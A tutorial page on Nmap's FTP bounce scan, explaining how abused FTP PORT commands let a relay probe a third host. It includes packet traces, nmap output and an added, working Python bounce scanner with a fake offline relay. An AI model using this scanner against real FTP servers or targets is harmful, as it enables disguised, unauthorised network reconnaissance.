FTP Bounce Attack (-b <ftp_relay_host>)
Requires Privileged Access: NO
Identifies TCP Ports: YES
Identifies UDP Ports: NO

The FTP bounce attack is infamous in the network security world. Most FTP servers have since been retooled to refuse PORT commands that name a third-party address, which has largely nullified the threat and makes this attack more interesting for its technical process than for its potential maliciousness. Like idlescan, the FTP bounce attack uses a third host to act as a proxy between the nmap host and the destination station, so the target sees the FTP server, not the nmap host, as the source of the scan.


A detailed and widely cited discussion of the FTP bounce attack was written by "Hobbit" on the Bugtraq mailing list. A copy of the message can be found at this location:

http://www.insecure.org/nmap/hobbit.ftpbounce.txt

The FTP bounce attack abuses active mode FTP, in which the client names the address and port for the data connection with the PORT command and the FTP server connects out to it. A server that accepts any address in PORT can therefore be made to transmit information to any device on the network. For a detailed explanation of active mode FTP vs. passive mode FTP, refer to this site:

http://slacksite.com/other/ftp.html



FTP Bounce Attack Operation
The FTP bounce attack wouldn't be possible if it weren't for active mode FTP. In FTP, the command (control) connection is completely separate from the data connection, and in active mode the FTP server is responsible for building the outbound data connection, from its port 20 to the address and port the client supplied in the PORT command. That is convenient on the server's side of a firewall, since only port 21 needs to be reachable inbound. However, it also means that a user could send a PORT command to an FTP server that would direct the data towards a completely different host, unless the server checks that the PORT address matches the source of the control connection!

From a security perspective, a "bounceable" FTP server is a serious concern: anyone who can log in to it can open connections, and deliver data, with the FTP server's address as the source. For the purposes of port scanning, however, this situation couldn't be more convenient! The FTP bounce attack takes advantage of these poorly configured FTP servers to provide nmap with a unique method of locating open ports.

To begin the bounce attack process, nmap must log in to the FTP server that will be used as the "middleman"; anonymous access is all it needs. Once connected to the FTP server, nmap sends a PORT command for each port to be tested, directing the next data connection to the destination IP address and TCP port.

The PORT command has a peculiar syntax. It is followed by six numbers separated by commas. The first four numbers are the four octets of the destination IP address, and the last two encode the port number on the remote device. To convert them to a port number, multiply the second-to-last number by 256 and add the last number. For example, the command PORT 192,168,0,5,2,44 refers to IP address 192.168.0.5 and port (2*256)+44, or port 556.

Once the FTP server has accepted the PORT command, nmap sends a LIST command, which forces the FTP server to open the data connection to the IP address and TCP port it was just given. The FTP server attempts a TCP connection to the device specified in the PORT command, and its reply to LIST tells nmap whether that connection succeeded.

A closed port answers the FTP server's SYN with a RST, and the FTP server informs the source station that it can't build the data connection (reply code 425):

Source        Destination   Summary 
--------------------------------------------------------------------------------------
[192.168.0.8] [192.168.0.7] FTP: C PORT=37205   PORT 192,168,0,5,0,93
[192.168.0.7] [192.168.0.8] FTP: R PORT=37205   200 PORT command successful.
[192.168.0.8] [192.168.0.7] FTP: C PORT=37205   LIST
[192.168.0.7] [192.168.0.5] TCP: D=93 S=20 SYN SEQ=474501024 LEN=0 WIN=65535
[192.168.0.5] [192.168.0.7] TCP: D=20 S=93 RST ACK=474501025 WIN=0
[192.168.0.7] [192.168.0.8] FTP: R PORT=37205   425 Can't build data connection: Connection refused.
An open port completes the three-way handshake; the FTP server reports that the data connection is open (150), sends the directory listing to the target port, and reports the transfer complete (226):

Source        Destination   Summary 
--------------------------------------------------------------------------------------
[192.168.0.8] [192.168.0.7] FTP: C PORT=37205   PORT 192,168,0,5,0,135
[192.168.0.7] [192.168.0.8] FTP: R PORT=37205   200 PORT command successful.
[192.168.0.8] [192.168.0.7] FTP: C PORT=37205   LIST
[192.168.0.7] [192.168.0.5] TCP: D=135 S=20 SYN SEQ=4240951199 LEN=0 WIN=65535
[192.168.0.5] [192.168.0.7] TCP: D=20 S=135 SYN ACK=4240951200 SEQ=2193395373 LEN=0 WIN=65535
[192.168.0.7] [192.168.0.5] TCP: D=135 S=20     ACK=2193395374 WIN<<1=65700
[192.168.0.7] [192.168.0.8] FTP: R PORT=37205   150 Opening ASCII mode data connection for '/bin/ls'.
[192.168.0.7] [192.168.0.8] FTP: R PORT=37205   226 Transfer complete.
[192.168.0.7] [192.168.0.5] FTP: R PORT=135   Text Data
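The exchange shown in these two traces, written out as a small scanner that drives the FTP control channel the way nmap does. This is an added example, not code from the page or from Nmap: encode_port() produces the six-number PORT argument, bounce_scan() logs in, issues PORT and LIST for each port and classifies the port from the relay's reply (425 closed, 150 followed by 226 open, anything else unknown), and it stops if the relay rejects a third-party PORT, since such a server is not bounceable. So that it runs offline, it also includes FakeBounceableFtp, a constructed stand-in for the relay 192.168.0.7 that answers as the traces above show without opening any data connection; the loopback relay, the anonymous credentials, and the set of ports it treats as open are all assumptions.

```python
import socket
import socketserver
import threading

def encode_port(ip, port):
    """PORT argument for ip:port, i.e. h1,h2,h3,h4,p1,p2 with port = p1*256 + p2."""
    octets = ip.split(".")
    if len(octets) != 4 or not 0 <= port <= 65535:
        raise ValueError("bad address %r or port %r" % (ip, port))
    return ",".join(octets + [str(port >> 8), str(port & 0xFF)])

def decode_port(arg):
    """Inverse of encode_port: 'h1,h2,h3,h4,p1,p2' -> (ip, port)."""
    h1, h2, h3, h4, p1, p2 = (int(x) for x in arg.strip().split(","))
    return "%d.%d.%d.%d" % (h1, h2, h3, h4), p1 * 256 + p2

def read_reply(f):
    """Read one FTP reply (a multi-line 'NNN-' block ends at 'NNN ') -> (code, text)."""
    lines = [f.readline()]
    code, sep = lines[0][:3], lines[0][3:4]
    if not (code.isdigit() and sep in (b" ", b"-")):
        raise ConnectionError("bad or missing reply: %r" % lines[0])
    while sep == b"-" and not lines[-1].startswith(code + b" "):
        lines.append(f.readline())
        if not lines[-1]:
            raise ConnectionError("control connection closed mid-reply")
    return int(code), b"".join(lines).decode("ascii", "replace")

def send_cmd(f, line):
    """Send one command on the control channel and return the reply it earns."""
    f.write(line.encode("ascii") + b"\r\n")
    f.flush()
    return read_reply(f)

def bounce_scan(relay, target_ip, ports, relay_port=21, user="anonymous",
                password="ftp@example.com", timeout=15):
    """Probe target_ip's TCP ports through the relay -> {port: 'open'|'closed'|'unknown'}."""
    results = {}
    with socket.create_connection((relay, relay_port), timeout=timeout) as sock, \
            sock.makefile("rwb") as f:
        if read_reply(f)[0] != 220:                # greeting
            raise RuntimeError("relay did not send a 220 greeting")
        code, text = send_cmd(f, "USER " + user)
        if code == 331:
            code, text = send_cmd(f, "PASS " + password)
        if code != 230:
            raise RuntimeError("login rejected: " + text.strip())
        for port in ports:
            code, text = send_cmd(f, "PORT " + encode_port(target_ip, port))
            if code != 200:                        # 500/501: relay refuses third-party PORT
                raise RuntimeError("relay is not bounceable: " + text.strip())
            code, text = send_cmd(f, "LIST")       # makes the relay connect to the target
            if code == 425:
                results[port] = "closed"           # relay's SYN was answered with a RST
            elif code in (125, 150):
                results[port] = "open"             # handshake completed, listing delivered
                read_reply(f)                      # drain the closing 226 (or 426)
            else:
                results[port] = "unknown"          # e.g. 421/450: timed out, likely filtered
        send_cmd(f, "QUIT")
    return results

class FakeBounceableFtp(socketserver.StreamRequestHandler):
    """Constructed stand-in for relay 192.168.0.7 in the traces above: grants anonymous login,
    accepts any PORT target and answers LIST as if the data connection had been accepted
    (ports in OPEN_PORTS) or refused.  It never opens a real data connection."""
    OPEN_PORTS = {135, 139, 445, 6969}             # constructed; mirrors the nmap output
    STATIC = {"USER": b"331 Password required\r\n", "PASS": b"230 Login successful\r\n",
              "QUIT": b"221 Goodbye.\r\n"}

    def handle(self):
        self.wfile.write(b"220-constructed relay\r\n220 ready\r\n")   # multi-line greeting
        target = None
        for line in self.rfile:                    # ends when the client closes the connection
            verb, _, arg = line.decode("ascii", "replace").strip().upper().partition(" ")
            if verb == "PORT":
                target = decode_port(arg)
                self.wfile.write(b"200 PORT command successful.\r\n")
            elif verb == "LIST" and target and target[1] in self.OPEN_PORTS:
                self.wfile.write(b"150 Opening ASCII mode data connection for '/bin/ls'.\r\n"
                                 b"226 Transfer complete.\r\n")
            elif verb == "LIST":
                self.wfile.write(b"425 Can't build data connection: Connection refused.\r\n")
            else:
                self.wfile.write(self.STATIC.get(verb, b"502 Command not implemented.\r\n"))

def demo():
    """Scan through the constructed relay on loopback; returns the port -> state map."""
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakeBounceableFtp)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        return bounce_scan("127.0.0.1", "192.168.0.5", [93, 135, 139, 445],
                           relay_port=srv.server_address[1])
    finally:
        srv.shutdown()
        srv.server_close()

if __name__ == "__main__":
    print(demo())
```

demo() only exercises the constructed relay; to try a real one, call bounce_scan() with the relay's address and port 21. A server that checks the PORT address against the control connection answers 500 or 501, and the scanner stops there instead of silently reporting the target as filtered, which is the first thing to check before blaming a firewall.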
The nmap output shows the results of the FTP bounce scan. Because the bounce scan is often performed through firewalls that would block nmap's own ping probes, nmap prints a reminder to include the "don't ping" option (-P0 in this release; later Nmap versions call it -Pn) on the command line. Note that nmap itself only ever talks to the FTP server; every probe the target sees comes from the FTP server's address.
# nmap -v -b anonymous:[email protected] 192.168.0.5
Hint: if your bounce scan target hosts aren't reachable from here, remember to
use -P0 so we don't try and ping them prior to the scan

Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-04-23 20:37 EDT
Resolved ftp bounce attack proxy to 192.168.0.7 (192.168.0.7).
Attempting connection to ftp://anonymous:[email protected]:21
Connected:Login credentials accepted by ftp server!
Initiating TCP ftp bounce scan against 192.168.0.5 at 20:37
Discovered open port 6969/tcp on 192.168.0.5
Discovered open port 135/tcp on 192.168.0.5
Discovered open port 139/tcp on 192.168.0.5
Discovered open port 445/tcp on 192.168.0.5
Scanned 1663 ports in 9 seconds via the Bounce scan.
Host 192.168.0.5 appears to be up ... good.
Interesting ports on 192.168.0.5:
(The 1659 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
6969/tcp open  acmsoda
MAC Address: 00:11:43:43:A8:34 (Dell   (WW Pcba Test))

Nmap finished: 1 IP address (1 host up) scanned in 20.602 seconds
               Raw packets sent: 2 (68B) | Rcvd: 1 (46B)
#